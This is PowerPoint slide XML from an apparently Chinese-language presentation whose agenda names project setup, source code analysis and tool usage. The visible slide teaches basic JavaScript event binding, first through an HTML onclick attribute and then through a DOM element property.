                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>复现</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="序号"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3079921" y="25839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02</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="项标题"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3079921" y="3327460"/>
            <a:ext cx="1665168" cy="1222859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>项目搭建</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="直接连接符 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6627040" y="285135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序号"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6699241" y="26093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04</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="项标题"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6699241" y="3352860"/>
            <a:ext cx="1665168" cy="1222859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>源码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="直接连接符 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8565695" y="2826587"/>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序号"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8637896" y="2584609"/>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05</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="项标题"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId14"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8637896" y="3328095"/>
            <a:ext cx="1665168" cy="1222859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>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08210" y="381406"/>
            <a:ext cx="10515600" cy="576984"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>前端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510173" y="1077430"/>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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="608210" y="1233356"/>
            <a:ext cx="10698800"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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>引入方式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="608210" y="1855329"/>
            <a:ext cx="9461820" cy="517190"/>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400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>方式一：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>标签中的事件属性进行绑定</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="!!矩形: 圆角 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475054" y="2372518"/>
            <a:ext cx="8594976" cy="1665675"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3860"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFE4"/>
          </a:solidFill>
          <a:ln w="635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eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"button"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"on()"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>按钮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="800000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="800000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> on(){</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>我被点击了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本占位符 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="608210" y="4293729"/>
            <a:ext cx="9461820" cy="517190"/>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sz="1400" dirty="0"/>
              <a:t>方式二：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>元素属性绑定</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="!!矩形: 圆角 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475054" y="4810919"/>
            <a:ext cx="8594976" cy="1665675"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3860"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFE4"/>
          </a:solidFill>
          <a:ln w="635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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"button"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"btn"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
